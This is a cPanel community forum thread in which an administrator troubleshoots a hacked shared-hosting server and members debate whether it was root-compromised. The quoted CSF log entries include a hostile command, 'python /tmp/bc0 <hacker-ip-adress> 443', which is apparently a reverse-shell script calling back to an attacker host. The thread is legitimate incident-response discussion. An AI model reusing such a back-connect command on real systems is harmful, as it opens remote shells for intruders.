The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Websites Hacked

Discussion in 'Security' started by abdelhost77, May 25, 2013.

  1. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    someone did inject :
    -rw-r--r-- 1 root root index.htm

    in the public_html of all the accounts in the server , even if i have :

    Last Cpanel release
    Kernel patched
    /tmp secured
    suphp
    patch avoid Symlink
    Firewall CSF&LFD
    Mod security


    any one have an idea how this can be done with all security stuffs above ?
    It is crritical please

    thanks a lot
     
  2. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    I think it was a python or perl scrript ,

    can we deactivate Python or perl script from been used by apache ?

    for example to remove :
    AddHandler cgi-script .cgi .pl .plx .ppl .perl

    From httpd.conf ?
     
  3. simonas

    simonas Well-Known Member

    Joined:
    Apr 21, 2013
    Messages:
    141
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Lithuania
    cPanel Access Level:
    Root Administrator
    Disable cgi in the package.
     
  4. nospa

    nospa Well-Known Member

    Joined:
    Apr 23, 2012
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Reseller Owner
    How did you find that this was a perl script executed via apache? Permissions are root:root so it might be a root compromise.
     
  5. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    Thanks for your feedback

    no am sure it was not a root compromise because the attacker was just able to inject index.htm file

    i think he use some php functions such as "chown" , "chmod" , to change owneship file , and "fsockopen" php functions to inject file .

    I did add thoses functions to disable_php

    In logs we found :

    CSF Logs :
    python /tmp/bc0


    SUEXEC Logs :
    cmd: python.izo
    cmd: shell.izo



    But /tmp is secured so no execution rights .

    Im still not 100% sure how he does that .
     
    #5 abdelhost77, May 25, 2013
    Last edited: May 25, 2013
  6. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    Only root can create root-owned files, or change the owner to root.

    Your box is rooted. It's practically impossible to clean it without reloading the OS.
     
  7. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    thanks QuiedtFinn

    But i dont think so , the root password has not been changed by the Attacker

    and also , the PHP hack scripts were launched from one cpanel account that waas using joomla and which acccount was hacked than putting some PHP hacks scripts .

    but once i suspend that cpanel account , the attacker was unable to do the same .

    actually i add some suspicious PHP functions to disable_functions in php.ini

    hope this fix the issue .
     
  8. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,724
    Likes Received:
    660
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello :)

    I have to agree that at the very least, this type of activity warrants an investigation by a qualified system administrator to determine if the server has been rooted. It's a good idea to consult with a qualified system administrator or security specialist if your system has been exploited and you have little experience with security. Some companies list their services for this in the cPanel application catalog:

    cPanel Application Catalog - System Administration Services

    Thank you.
     
  9. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    If disabling one Joomla account stopped the activity perhaps it wasn't a root compromise.

    However, as far as I know the chown() call only works for root, so that doesn't sound good. You're confused about the root password; it's not required to exploit a system. Sure, sometimes the exploiters change the root password, but as that tends to make it very obvious that they have access, they nearly always leave it alone.

    Likely as a newbie admin you won't be able to solve this one on your own, you probably want to seek some skilled help.
     
  10. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    When an attacker compromises a server, the attacker usually wants to avoid drawing the attention of the legitimate owner of the server, because the legitimate owner at that point would probably reinstall the operating system and harden it, making the attacker's work for naught. An attacker changing the root password would be a sure way to catch the attention of the legitimate owner. Because of that, the fact that the root password has not changed does not mean that the server is not root compromised.

    You need to get a qualified security expert to look at your server, and you need to seriously consider making sure you have good backups of your data, reformatting the hard drive and reinstalling the operating system and cPanel, and restoring your backed-up data.
     
  11. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator



    We have Many servers , and the one who was hacked was freshly installed so i think we did forgot to secure /tmp , and "anonymous FTP" was also activated , so i think some of this two , or both , things has been used to compromise the server . like a perl script executed from /tmp who is using anonymous FTP acces to inject index.htm file in all public_html accounts . But im sure it is not a root compromise .

    In fact , if i take a root:root file form server1 and send it by Anonymous FTP to server2 , the owner of the file in server2 will be root:root ?
     
    #11 abdelhost77, Jun 26, 2013
    Last edited: Jun 26, 2013
  12. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Rooting a server does not require a highly skilled hacker. There is a reason for the word "rootkit" - it is a kit that does not require skills.

    It is your server, so you are free to do whatever you want, but the fact that the root password was not changed does not mean the server was not rooted. Typically, once a perpetrator roots a server, he wants to keep control of it as long as possible, and changing the root password would definitely get the server administrator's attention, so usually the root password is not changed.

    You can either reformat and reinstall and know that the server is not compromised, or you can pick and choose evidence that supports the idea that it is not compromised. You have been given a lot of good advice in this thread, but what you do with it is entirely your responsibility.
     
  13. cPanelJared

    cPanelJared Technical Analyst
    Staff Member

    Joined:
    Feb 25, 2010
    Messages:
    1,842
    Likes Received:
    18
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    No. The owner of the file will be the anonymous FTP user. This is not proof that your server is not rooted.
     
  14. Serra

    Serra Well-Known Member

    Joined:
    Oct 27, 2005
    Messages:
    213
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Florida
    To say that the box was not access because the account was disabled doesn't prove the hacker no longer has access. Absence of proof it not itself proof. The hacker might just be slow to update their script or hasn't got back to attacking the box again.
     
  15. stdout

    stdout Well-Known Member

    Joined:
    Apr 10, 2003
    Messages:
    189
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Nelspruit, Mpumalanga, South Africa
    cPanel Access Level:
    Root Administrator
    Nicely put.
     
  16. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    I know that for a non-native English speaker the meaning of the word "perhaps" might not be clear; it actually means fairly much the opposite of "proves". Also worth reading the rest of the message in which I say he should get skilled help. :) The sentence was discussing whether the box had a root-level compromise or not, which is quite different from whether a hacker might come back or not. The fact that the exploit stopped once the account was disabled is suggestive of it not being a root hack. Regardless, more forensic examination of the box is required; if file ownership was changed then it sounds like the box was hacked.

    (And yes, what you say is of course entirely true, once rooted always rooted; if in fact he has been rooted)
     
  17. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator
    In fact i think the reason is that /tmp was not enough secured because we found in CSF logs :

    Executable:

    /usr/bin/python

    Command Line (often faked in exploits):

    python /tmp/bc0 <hacker-ip-adress> 443

    it seems to be some Python rootkit script .
     
  18. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,146
    Likes Received:
    34
    Trophy Points:
    48
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hello,

    You will have to mount your /tmp with nosuid,noexec,nodev options
     
  19. abdelhost77

    abdelhost77 Well-Known Member

    Joined:
    Apr 25, 2012
    Messages:
    81
    Likes Received:
    1
    Trophy Points:
    8
    cPanel Access Level:
    Root Administrator

    YEs sure , actually it is
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)

    But i was talking about the reason how the server got compromised.
     
Loading...

Share This Page